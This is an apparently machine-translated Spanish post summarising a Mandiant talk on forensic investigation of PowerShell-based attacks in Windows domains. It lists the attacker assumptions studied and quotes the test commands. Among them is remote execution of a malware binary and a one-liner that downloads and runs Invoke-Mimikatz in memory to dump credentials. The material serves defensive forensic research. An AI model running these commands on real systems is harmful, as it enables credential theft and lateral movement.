TAGS
Esta es una presentación excelente y recomiendo encarecidamente a cualquiera que es un administrador o que es responsable de la seguridad de AD.
La investigación de los ataques PowerShell director Ryan Kazanciyan técnica, Mandiant Matt Hastings Consultor, Mandiant En los últimos dos años, hemos visto que los atacantes utilizan cada vez más dirigidos PowerShell para llevar a cabo-comando y control en entornos Windows comprometidos. Si su organización está ejecutando Windows 7 o Server 2008 R2, que tienes instalado PowerShell 2.0 (y en Server 2012, la comunicación remota está activado por defecto!). Esto ha creado un nuevo campo de juego conjunto de técnicas de ataque para los intrusos que ya han aparecido algunas cuentas de administrador (o un dominio completo). Incluso si usted no está legítimamente uso de PowerShell para administrar sus sistemas, es necesario ser conscientes de cómo los atacantes pueden activar y abusar de sus características. Esta presentación se centrará en los patrones de ataque comunes que se realizan a través de PowerShell - tales como el movimiento lateral, ejecución remota de comandos, reconocimiento, transferencia de archivos, etc. - y las fuentes de prueba que dejar atrás. Vamos a demostrar cómo recolectar e interpretar estos forenseartefactos, tanto en los hosts individuales y en las escalas dentro de la empresa. A lo largo de la presentación, incluiremos ejemplos de incidentes de la vida real y recomendaciones sobre la manera de limitar la exposición a estos ataques.
Desde su:
Por lo tanto, los autores basan sus investigaciones en los siguientes supuestos: • El atacante puede obtener derechos de administrador equivalente en el sistema de destino - más típicamente, las credenciales de una cuenta de dominio privilegiado. • El atacante lateralmente puede acceder al sistema de destino a través de puertos y protocolos comunes de Windows (por ejemplo, SMB, NetBIOS y / o WinRM) • El atacante puede activar de forma remota PowerShell interacción remota y el servicio WinRM en un host remoto por medio de otros comandos nativa de Windows - como por ejemplo a través de una tarea programada ( "a" de comandos), el administrador de control de servicios (comando "sc") o Windows (WMI). • El atacante puede pasar por alto el valor por defecto "Restringido" política bajo la cual se ejecutará secuencias de comandos PowerShell. • El atacante, dado privilegios de administrador, podría eludir o desactivar un punto final de la comunicación remota restringida configurado para limitar el alcance de los comandos disponibles PowerShell para un usuario. (Un atacante con menos privilegios también puede pasar por alto este tipo de controles - Joseph Bialek y Lee HolmesTambién han blogged recientemente en técnicas de salir de constrainedrunspace, si se implementa con código vulnerable, y ejecutar comandos no autorizados.
Los autores ejecuta la siguiente secuencia de comandos durante la prueba. Estos comandos se eligieron como ejemplos representativos de cómo un atacante podría interactuar con un sistema de objetivo a través de PowerShell. También hacen uso de cmdlets básicos que son susceptibles de ser utilizados incluso en los ataques más complejos. • La ejecución de cmdlet remoto individual a través de Invoke-Command, tales como: Invoke-Command 192.168.17.150 {Get-ChildItem c: \} • ejecución remota binario único mediante Invoke-Command, tales como: Invoke-Command 192.168.17.150 {c: \ malware.exe} • remoto en memoria de descarga y ejecución de scripts de marco PowerSploit Invoke-Mimikatz.ps1, tales como: Invoke-Command 192.168.17.150 {iex ((New-Object Net.WebClient). DownloadString(‘githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds} • sesión interactiva de comandos PowerShell remoto iniciado con la sintaxis: Enter-PSSession 192.168.17.150
.
